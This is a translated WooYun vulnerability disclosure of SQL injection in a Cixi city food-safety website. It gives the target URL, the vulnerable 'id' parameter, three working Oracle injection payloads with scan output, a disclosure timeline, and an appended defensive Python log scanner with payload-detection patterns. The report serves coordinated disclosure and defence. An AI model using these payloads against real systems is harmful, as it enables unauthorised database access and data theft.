
Vulnerability summary

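Bug ID: wooyun-2015-096148

Title: SQL injection in a system belonging to a city in Zhejiang (Oracle database)

Vendor: CNCERT (National Internet Emergency Center)

Author: 路人甲

Submitted: 2015-02-10 16:11

Fixed: 2015-03-27 16:12

Disclosed: 2015-03-27 16:12

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 10

Status: Handed over to a third-party partner organization (CNCERT, National Internet Emergency Center) for handling

Source: http://www.wooyun.org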


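Vulnerability details

Disclosure status:

2015-02-10: Details reported to the vendor; waiting for the vendor to handle them
2015-02-13: Vendor has confirmed; details disclosed to the vendor only
2015-02-23: Details disclosed to core white hats and experts in related fields
2015-03-05: Details disclosed to regular white hats
2015-03-15: Details disclosed to trainee white hats
2015-03-27: Details disclosed to the public

Brief description:

SQL injection in a system belonging to a city in Zhejiang

Detailed description:

Cixi City Food Safety Information Network, commodity admission system
A large amount of information
I don't understand why an ASP site is running on an Oracle database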


http://www.cxaic.gov.cn/xgwj/xgwj_show.asp?id=2

Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=2 AND 4468=4468
Type: error-based
Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
Payload: id=2 AND 1494=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(98)||CHR(113)||CHR(122)||CHR(113)||(SELECT (CASE WHEN (1494=1494) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(107)||CHR(113)||CHR(120)||CHR(113)||CHR(62))) FROM DUAL)
Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: id=2 AND 3118=DBMS_PIPE.RECEIVE_MESSAGE(CHR(79)||CHR(78)||CHR(75)||CHR(82),5)
---
web server operating system: Windows 2003 or XP
web application technology: Microsoft IIS 6.0, ASP
back-end DBMS: Oracle


available databases [26]:

Proof of vulnerability:

As above

Fix:

Filter

Copyright notice: when reposting, please credit the source 路人甲@乌云 (WooYun)
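
An added example (not part of the original report, and not code from the affected site): a Python check that applies a strict numeric allow-list to the `id` parameter, as the fix proposed above implies, and labels rejected values by the three payload families in the scan output. The W3C field layout, the IP addresses and the log lines are constructed for illustration.

```python
import re
from urllib.parse import parse_qs

# Patterns for the three payload families listed in the scan output above.
SIGNATURES = [
    ("time-based blind", re.compile(r"DBMS_PIPE\.RECEIVE_MESSAGE\s*\(", re.I)),
    ("error-based", re.compile(r"\bXMLType\s*\(", re.I)),
    ("boolean-based blind", re.compile(r"\b(?:AND|OR)\s+(\d+)\s*=\s*\1\b", re.I)),
]
STRICT_ID = re.compile(r"[0-9]{1,9}")  # allow-list: what a record id should look like

def classify_id(value):
    """Return 'ok' for a plain numeric id, else the matching payload family."""
    if STRICT_ID.fullmatch(value):
        return "ok"
    for family, pattern in SIGNATURES:
        if pattern.search(value):
            return family
    return "non-numeric id"

def scan_w3c_log(text, param="id"):
    """Return (client_ip, uri_stem, verdict) for each request whose id is not numeric."""
    fields, findings = [], []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]  # column names for the rows that follow
            continue
        if not line.strip() or line.startswith("#") or not fields:
            continue
        row = dict(zip(fields, line.split()))
        # parse_qs decodes '+' and %XX, so encoded payloads are matched too
        for value in parse_qs(row.get("cs-uri-query", ""), keep_blank_values=True).get(param, []):
            verdict = classify_id(value)
            if verdict != "ok":
                findings.append((row.get("c-ip"), row.get("cs-uri-stem"), verdict))
    return findings

# Constructed IIS W3C log lines (documentation IP ranges, shortened payloads).
SAMPLE_LOG = """\
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2015-02-10 08:01:12 192.0.2.10 GET /xgwj/xgwj_show.asp id=2 200
2015-02-10 08:01:15 198.51.100.7 GET /xgwj/xgwj_show.asp id=2+AND+4468=4468 200
2015-02-10 08:01:16 198.51.100.7 GET /xgwj/xgwj_show.asp id=2+AND+1494=(SELECT+UPPER(XMLType(CHR(60)||CHR(58)))+FROM+DUAL) 500
2015-02-10 08:01:22 198.51.100.7 GET /xgwj/xgwj_show.asp id=2+AND+3118=DBMS_PIPE.RECEIVE_MESSAGE(CHR(79)||CHR(78),5) 200
2015-02-10 08:02:00 192.0.2.44 GET /xgwj/xgwj_show.asp id=2%27 500
"""

if __name__ == "__main__":
    for finding in scan_w3c_log(SAMPLE_LOG):
        print(finding)
```

The allow-list is the control and rejects anything that is not a short run of digits; the signatures only label what was rejected, and binding `id` as a typed query parameter in the page itself removes the injection point regardless of what the filter catches.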


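Vulnerability response

Vendor response:

Severity: Medium

Vulnerability Rank: 10

Confirmed: 2015-02-13 09:52

Vendor reply:

CNVD has confirmed the reported issue and has forwarded it via CNCERT to the Zhejiang branch center, which will coordinate with the organization that manages the website to handle it.

Latest status:

None yet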